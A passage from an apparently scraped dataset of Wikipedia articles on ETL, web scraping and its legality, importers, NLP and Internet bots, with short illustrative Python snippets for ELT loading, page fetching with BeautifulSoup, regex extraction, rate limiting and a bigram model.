which may mean the same amount of data may have to be processed in less time. Some ETL systems have to scale to process terabytes of data to update data warehouses with tens of terabytes of data. Increasing volumes of data may require designs that can scale from daily batch to multiple-day micro batch to integration with message queues or real-time change-data-capture for continuous transformation and update. ETL vendors benchmark their record-systems at multiple TB (terabytes) per hour (or 1 GB per second) using powerful servers with multiple CPUs, multiple hard drives, multiple gigabit-network connections, and much memory. In real life, the slowest part of an ETL process usually occurs in the database load phase. 
Databases may perform slowly because they have to take care of concurrency, integrity maintenance, and indices. Thus, for better performance, it may make sense to employ: Still, even using bulk operations, database access is usually the bottleneck in the ETL process. Some common methods used to increase performance are: Whether to do certain operations in the database or outside may involve a trade-off. For example, removing duplicates using distinct may be slow in the database; thus, it makes sense to do it outside. On the other side, if using distinct significantly (x100) decreases the number of rows to be extracted, then it makes sense to remove duplications as early as possible in the database before unloading data. A common source of problems in ETL is a big number of dependencies among ETL jobs. For example, job "B" cannot start while job "A" is not finished. One can usually achieve better performance by visualizing all processes on a graph, and trying to reduce the graph making maximum use of parallelism, and making "chains" of consecutive processing as short as possible. Again, partitioning of big tables and their indices can really help. Another common issue occurs when the data are spread among several databases, and processing is done in those databases sequentially. Sometimes database replication may be involved as a method of copying data between databases — it can significantly slow down the whole process. The common solution is to reduce the processing graph to only three layers: This approach allows processing to take maximum advantage of parallelism. For example, if you need to load data into two databases, you can run the loads in parallel (instead of loading into the first — and then replicating into the second). Sometimes processing must take place sequentially. For example, dimensional (reference) data are needed before one can get and validate the rows for main "fact" tables. A recent update development in ETL software is the implementation of parallel processing. It has enabled a number of methods to improve overall performance of ETL when dealing with large volumes of data. ETL applications implement three main types of parallelism: All three types of parallelism usually operate combined in a single job or task. An additional difficulty comes with making sure that the data being uploaded is relatively consistent. Because multiple source databases may have different update cycles (some may be updated every few minutes, while others may take days or weeks), an ETL system may be required to hold back certain data until all sources are synchronized. Likewise, where a warehouse may have to be reconciled to the contents in a source system or with the general ledger, establishing synchronization and reconciliation points becomes necessary. Data warehousing procedures usually subdivide a big ETL process into smaller pieces running sequentially or in parallel. To keep track of data flows, it makes sense to tag each data row with "row id", and tag each piece of the process with "run id". In case of a failure, having these IDs help to roll back and rerun the failed piece. Best practice also calls for checkpoints, which are states when certain phases of the process are completed. Once at a checkpoint, it is a good idea to write everything to disk, clean out some temporary files, log the state, etc. As of 2010 update , data virtualization had begun to advance ETL processing. 
The application of data virtualization to ETL allowed solving the most common ETL tasks of data migration and application integration for multiple dispersed data sources. Virtual ETL operates with the abstracted representation of the objects or entities gathered from the variety of relational, semi-structured, and unstructured data sources. ETL tools can leverage object-oriented modeling and work with entities' representations persistently stored in a centrally located hub-and-spoke architecture. Such a collection that contains representations of the entities or objects gathered from the data sources for ETL processing is called a metadata repository and it can reside in memory or be made persistent. By using a persistent metadata repository, ETL tools can transition from one-time projects to persistent middleware, performing data harmonization and data profiling consistently and in near-real time. Unique keys play an important part in all relational databases, as they tie everything together. A unique key is a column that identifies a given entity, whereas a foreign key is a column in another table that refers to a primary key. Keys can comprise several columns, in which case they are composite keys. In many cases, the primary key is an auto-generated integer that has no meaning for the business entity being represented, but solely exists for the purpose of the relational database - commonly referred to as a surrogate key. As there is usually more than one data source getting loaded into the warehouse, the keys are an important concern to be addressed. For example: customers might be represented in several data sources, with their Social Security number as the primary key in one source, their phone number in another, and a surrogate in the third. Yet a data warehouse may require the consolidation of all the customer information into one dimension. A recommended way to deal with the concern involves adding a warehouse surrogate key, which is used as a foreign key from the fact table. 6 Usually, updates occur to a dimension's source data, which obviously must be reflected in the data warehouse. If the primary key of the source data is required for reporting, the dimension already contains that piece of information for each row. If the source data uses a surrogate key, the warehouse must keep track of it even though it is never used in queries or reports; it is done by creating a lookup table that contains the warehouse surrogate key and the originating key. 7 This way, the dimension is not polluted with surrogates from various source systems, while the ability to update is preserved. The lookup table is used in different ways depending on the nature of the source data. There are 5 types to consider; 7 three are included here: An established ETL framework may improve connectivity and scalability. citation needed A good ETL tool must be able to communicate with the many different relational databases and read the various file formats used throughout an organization. ETL tools have started to migrate into enterprise application integration, or even enterprise service bus, systems that now cover much more than just the extraction, transformation, and loading of data. Many ETL vendors now have data profiling, data quality, and metadata capabilities. A common use case for ETL tools include converting CSV files to formats readable by relational databases. 
A typical translation of millions of records is facilitated by ETL tools that enable users to input CSV-like data feeds and import them into a database with as little code as possible. ETL tools are used by a broad range of professionals, from computer science students looking to quickly import large data sets to database architects in charge of company account management. They have become a convenient tool that can be relied on to get maximum performance. ETL tools in most cases contain a GUI that helps users conveniently transform data, using a visual data mapper, as opposed to writing large programs to parse files and modify data types. While ETL tools have traditionally been for developers and IT staff, research firm Gartner wrote that the new trend is to provide these capabilities to business users so they can themselves create connections and data integrations when needed, rather than going to the IT staff. 8 Gartner refers to these non-technical users as Citizen Integrators. 9 Extract, load, transform (ELT) is a variant of ETL where the extracted data is loaded into the target system first. 10 The architecture for the analytics pipeline must also consider where to cleanse and enrich data 10 as well as how to conform dimensions. 1 Some of the benefits of an ELT process include speed and the ability to more easily handle both unstructured and structured data. 11 Ralph Kimball and Joe Caserta's book The Data Warehouse ETL Toolkit (Wiley, 2004), which is used as a textbook for courses teaching ETL processes in data warehousing, addressed this issue. 12 Cloud-based data warehouses like Amazon Redshift, Google BigQuery, Microsoft Azure Synapse Analytics and Snowflake have been able to provide highly scalable computing power. This lets businesses forgo preload transformations and replicate raw data into their data warehouses, where the data can be transformed as needed using SQL. After having used ELT, data may be processed further and stored in a data mart. 13 Most data integration tools skew towards ETL, while ELT is popular in database and data warehouse appliances. Similarly, it is possible to perform TEL (Transform, Extract, Load) where data is first transformed on a blockchain (as a way of recording changes to data, e.g., token burning) before extracting and loading into another data store. 14 |
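As a rough illustration of the ELT pattern discussed above (replicate raw data first, then transform inside the warehouse with SQL), here is a minimal sketch using pandas and an in-memory SQLite database standing in for a cloud warehouse; the table and column names are made up.

import sqlite3
from io import StringIO

import pandas as pd

raw_csv = StringIO("order_id,amount,country\n1,10.5,us\n2,99.0,US\n3,5.0,de\n")

# "EL" step: load the raw CSV into the warehouse with no preload transformation.
conn = sqlite3.connect(":memory:")
pd.read_csv(raw_csv).to_sql("raw_orders", conn, index=False)

# "T" step: transform inside the database, as needed, using SQL.
transformed = pd.read_sql_query(
    """
    SELECT UPPER(country) AS country, SUM(amount) AS revenue
    FROM raw_orders
    GROUP BY UPPER(country)
    """,
    conn,
)
print(transformed)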
481 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Text_of_the_Creative_Commons_Attribution-ShareAlike_4.0_International_License | You are free: for any purpose, even commercially. The licensor cannot revoke these freedoms as long as you follow the license terms. Under the following terms: Notices: By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-ShareAlike 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. Your exercise of the Licensed Rights is expressly made subject to the following conditions. Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the "Licensor. The text of the Creative Commons public licenses is dedicated to the public domain under the CC0 Public Domain Dedication. Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at creativecommons.org policies, Creative Commons does not authorize the use of the trademark "Creative Commons" or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. |
482 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=history | For any version listed below, click on its date to view it. For more help, see Help:Page history and Help:Edit summary. (cur) difference from current version, (prev) difference from preceding version, m minor edit, section edit, automatic edit summary |
483 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-17 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation.
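The fetch-then-extract split described above can be illustrated with the requests and BeautifulSoup libraries already used in this notebook; example.com and the link-harvesting logic are placeholders, not part of the source.

import requests
from bs4 import BeautifulSoup

def fetch_and_extract(url):
    """Fetch a page (crawling step), then parse it and extract data (scraping step)."""
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    soup = BeautifulSoup(response.text, "html5lib")
    # Copy each hyperlink's text and target into a structure ready for a spreadsheet or database.
    return [
        {"text": a.get_text(strip=True), "href": a["href"]}
        for a in soup.find_all("a", href=True)
    ]

rows = fetch_and_extract("https://example.com")
print(rows[:5])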
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or the regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical-specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical, and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the long tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may include metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformats do, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 A newer approach uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers.
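A minimal sketch of the grep-style, regular-expression approach mentioned above, using Python's re module on an inline HTML snippet; the pattern is a deliberately simplified e-mail matcher, not a robust one.

import re

html = """
<ul>
  <li>Support: support@example.com</li>
  <li>Sales: sales@example.com (Mon-Fri)</li>
</ul>
"""

# grep-style extraction: a single pattern pulls every e-mail address out of the markup,
# without building a DOM tree at all.
email_pattern = re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+")
print(email_pattern.findall(html))   # ['support@example.com', 'sales@example.com']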
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include BeautifulSoup, a Python library that provides simple methods for extracting data from HTML and XML files; Scrapy, an open-source and collaborative web crawling framework for Python that allows you to extract data, process it, and store it; Octoparse, a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills; ParseHub, another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites; Apify, a platform that offers a wide range of scraping tools and the ability to create custom scrapers; and InstantAPI.ai, an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattels. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping.
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area is becoming more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced.
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's website during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court.
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Common techniques include blocking requests by IP address, monitoring and throttling excess traffic, and requiring CAPTCHA challenges; one such measure is sketched below. |
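One of those measures, rate limiting by client IP address, could be sketched roughly as follows; the window and threshold values are arbitrary illustrative choices, not recommendations from the source.

import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60            # illustrative values only
MAX_REQUESTS_PER_WINDOW = 30

_recent = defaultdict(deque)   # client ip -> timestamps of recent requests

def allow_request(client_ip, now=None):
    """Return False once a client exceeds the allowed request rate (likely a bot)."""
    now = time.time() if now is None else now
    timestamps = _recent[client_ip]
    while timestamps and now - timestamps[0] > WINDOW_SECONDS:
        timestamps.popleft()   # forget requests that fell out of the sliding window
    if len(timestamps) >= MAX_REQUESTS_PER_WINDOW:
        return False
    timestamps.append(now)
    return True

# Example: the 31st request within one minute from the same address is refused.
decisions = [allow_request("203.0.113.7", now=float(i)) for i in range(31)]
print(decisions[-1])           # False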
484 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Importer_(computing) | An importer is a software application that reads in a data file or metadata information in one format and converts it to another format via special algorithms (such as filters). An importer often is not an entire program by itself, but an extension to another program, implemented as a plug-in. When implemented in this way, the importer reads the data from the file and converts it into the hosting application's native format. 1 For example, the data file for a 3D model may be written from a modeler, such as 3D Studio Max. A game developer may then want to use that model in their game's editor. An importer, part of the editor, may read in the 3D Studio Max model and convert it to the game's native format so it can be used in game levels. Importers are important tools in the video game industry. A plug-in or application that does the converse of an importer is called an exporter. |
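As a toy illustration of the importer idea described in this article (reading one format and converting it into a hosting application's native representation), here is a sketch that imports CSV point data into a hypothetical native list-of-dicts format; the field names are invented, not from the source.

import csv
from io import StringIO

def import_points(csv_text):
    """Read point data in CSV form and convert it to the host's (hypothetical) native format."""
    reader = csv.DictReader(StringIO(csv_text))
    return [
        {"x": float(row["x"]), "y": float(row["y"]), "label": row.get("label", "")}
        for row in reader
    ]

native_points = import_points("x,y,label\n1.0,2.0,origin-ish\n3.5,4.25,corner\n")
print(native_points)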
485 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Natural_language_processing | Natural language processing (NLP) is an interdisciplinary subfield of computer science and artificial intelligence. It is primarily concerned with providing computers with the ability to process data encoded in natural language and is thus closely related to information retrieval, knowledge representation and computational linguistics, a subfield of linguistics. Typically data is collected in text corpora, using either rule-based, statistical or neural-based approaches in machine learning and deep learning. Major tasks in natural language processing are speech recognition, text classification, natural-language understanding, and natural-language generation. Natural language processing has its roots in the 1940s. 1 In 1950, Alan Turing published an article titled "Computing Machinery and Intelligence" which proposed what is now called the Turing test as a criterion of intelligence, though at the time that was not articulated as a problem separate from artificial intelligence. The proposed test includes a task that involves the automated interpretation and generation of natural language. The premise of symbolic NLP is well summarized by John Searle's Chinese room experiment: Given a collection of rules (e.g., a Chinese phrasebook, with questions and matching answers), the computer emulates natural language understanding (or other NLP tasks) by applying those rules to the data it confronts. Up until the 1980s, most natural language processing systems were based on complex sets of hand-written rules. Starting in the late 1980s, however, there was a revolution in natural language processing with the introduction of machine learning algorithms for language processing. This was due to both the steady increase in computational power (see Moore's law) and the gradual lessening of the dominance of Chomskyan theories of linguistics (e.g. transformational grammar), whose theoretical underpinnings discouraged the sort of corpus linguistics that underlies the machine-learning approach to language processing. 8 In 2003, the word n-gram model, at the time the best statistical algorithm, was outperformed by a multi-layer perceptron (with a single hidden layer and a context length of several words, trained on up to 14 million words with a CPU cluster for language modelling) by Yoshua Bengio and co-authors. 9 In 2010, Tom Mikolov (then a PhD student at Brno University of Technology) with co-authors applied a simple recurrent neural network with a single hidden layer to language modelling, 10 and in the following years he went on to develop Word2vec. In the 2010s, representation learning and deep neural network-style (featuring many hidden layers) machine learning methods became widespread in natural language processing. That popularity was due partly to a flurry of results showing that such techniques 11 12 can achieve state-of-the-art results in many natural language tasks, e.g., in language modeling 13 and parsing. 14 15 This is increasingly important in medicine and healthcare, where NLP helps analyze notes and text in electronic health records that would otherwise be inaccessible for study when seeking to improve care 16 or protect patient privacy.
17 The symbolic approach, i.e., the hand-coding of a set of rules for manipulating symbols, coupled with a dictionary lookup, was historically the first approach used both by AI in general and by NLP in particular, 18 19 such as by writing grammars or devising heuristic rules for stemming. Machine learning approaches, which include both statistical and neural networks, on the other hand, have many advantages over the symbolic approach. Although rule-based systems for manipulating symbols were still in use in 2020, they have become mostly obsolete with the advance of LLMs in 2023. Before that, they were commonly used. In the late 1980s and mid-1990s, the statistical approach ended a period of AI winter, which was caused by the inefficiencies of the rule-based approaches. 20 21 The earliest decision trees, producing systems of hard if-then rules, were still very similar to the old rule-based approaches. Only the introduction of hidden Markov models, applied to part-of-speech tagging, announced the end of the old rule-based approach. A major drawback of statistical methods is that they require elaborate feature engineering. Since 2015, 22 the statistical approach has been replaced by the neural networks approach, using semantic networks 23 and word embeddings to capture semantic properties of words. Intermediate tasks (e.g., part-of-speech tagging and dependency parsing) are not needed anymore. Neural machine translation, based on then-newly-invented sequence-to-sequence transformations, made obsolete the intermediate steps, such as word alignment, previously necessary for statistical machine translation. The following is a list of some of the most commonly researched tasks in natural language processing. Some of these tasks have direct real-world applications, while others more commonly serve as subtasks that are used to aid in solving larger tasks. Though natural language processing tasks are closely intertwined, they can be subdivided into categories for convenience. A coarse division is given below. Based on long-standing trends in the field, it is possible to extrapolate future directions of NLP. As of 2020, three trends among the topics of the long-standing series of CoNLL Shared Tasks can be observed. 46 Most higher-level NLP applications involve aspects that emulate intelligent behaviour and apparent comprehension of natural language. More broadly speaking, the technical operationalization of increasingly advanced aspects of cognitive behaviour represents one of the developmental trajectories of NLP (see trends among CoNLL shared tasks above). Cognition refers to "the mental action or process of acquiring knowledge and understanding through thought, experience, and the senses". 47 Cognitive science is the interdisciplinary, scientific study of the mind and its processes. 48 Cognitive linguistics is an interdisciplinary branch of linguistics, combining knowledge and research from both psychology and linguistics. 49 Especially during the age of symbolic NLP, the area of computational linguistics maintained strong ties with cognitive studies. As an example, George Lakoff offers a methodology to build natural language processing (NLP) algorithms through the perspective of cognitive science, along with the findings of cognitive linguistics, 50 with two defining aspects. Ties with cognitive linguistics are part of the historical heritage of NLP, but they have been less frequently addressed since the statistical turn during the 1990s.
Nevertheless, approaches to develop cognitive models towards technically operationalizable frameworks have been pursued in the context of various frameworks, e.g., of cognitive grammar, 53 functional grammar, 54 construction grammar, 55 computational psycholinguistics and cognitive neuroscience (e.g., ACT-R); however, uptake in mainstream NLP has been limited (as measured by presence at major conferences 56 of the ACL). More recently, ideas of cognitive NLP have been revived as an approach to achieve explainability, e.g., under the notion of "cognitive AI". 57 Likewise, ideas of cognitive NLP are inherent to neural models of multimodal NLP (although rarely made explicit) 58 and to developments in artificial intelligence, specifically tools and technologies using large language model approaches 59 and new directions in artificial general intelligence based on the free energy principle 60 by British neuroscientist and theoretician at University College London Karl J. Friston. |
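To make the statistical word n-gram approach mentioned earlier in this article concrete, here is a tiny bigram language-model sketch over a toy corpus, using only the standard library; the corpus and the resulting probabilities are purely illustrative.

from collections import Counter

corpus = "the cat sat on the mat . the dog sat on the rug .".split()

# Count unigrams and bigrams, then estimate P(next word | current word) by relative frequency.
unigrams = Counter(corpus)
bigrams = Counter(zip(corpus, corpus[1:]))

def bigram_probability(current, nxt):
    return bigrams[(current, nxt)] / unigrams[current] if unigrams[current] else 0.0

print(bigram_probability("sat", "on"))   # 1.0: "sat" is always followed by "on" in this toy corpus
print(bigram_probability("the", "cat"))  # 0.25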
486 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Internet_bot | An Internet bot, web robot, robot, or simply bot (an abbreviation of robot), 1 is a software application that runs automated tasks (scripts) on the Internet, usually with the intent to imitate human activity, such as messaging, on a large scale. 2 An Internet bot plays the client role in a client-server model, whereas the server role is usually played by web servers. Internet bots are able to perform simple and repetitive tasks much faster than a person could ever do. The most extensive use of bots is for web crawling, in which an automated script fetches, analyzes and files information from web servers. More than half of all web traffic is generated by bots. 3 Efforts by web servers to restrict bots vary. Some servers have a robots.txt file that contains the rules governing bot behavior on that server. Any bot that does not follow the rules could, in theory, be denied access to or removed from the affected website. If the posted text file has no associated program/software/app, then adhering to the rules is entirely voluntary. There would be no way to enforce the rules or to ensure that a bot's creator or implementer reads or acknowledges the robots.txt file. Some bots are "good", e.g. search engine spiders, while others are used to launch malicious attacks on political campaigns, for example. 3 Some bots communicate with users of Internet-based services, via instant messaging (IM), Internet Relay Chat (IRC), or other web interfaces such as Facebook bots and Twitter bots. These chatbots may allow people to ask questions in plain English and then formulate a response. Such bots can often handle reporting weather, zip code information, sports scores, currency or other unit conversions, etc. 4 Others are used for entertainment, such as SmarterChild on AOL Instant Messenger and MSN Messenger. Additional roles of an IRC bot may be to listen on a conversation channel, and to comment on certain phrases uttered by the participants (based on pattern matching). This is sometimes used as a help service for new users or to censor profanity. Social bots are sets of algorithms that take on the duties of repetitive sets of instructions in order to establish a service or connection among social networking users. Among the various designs of networking bots, the most common are chat bots, algorithms designed to converse with a human user, and social bots, algorithms designed to mimic human behaviors to converse with patterns similar to those of a human user. The history of social botting can be traced back to Alan Turing in the 1950s and his vision of designing sets of instructional code that could pass the Turing test. In the 1960s Joseph Weizenbaum created ELIZA, a natural language processing computer program considered an early indicator of artificial intelligence algorithms. ELIZA inspired computer programmers to design tasked programs that can match behavior patterns to their sets of instruction. As a result, natural language processing has 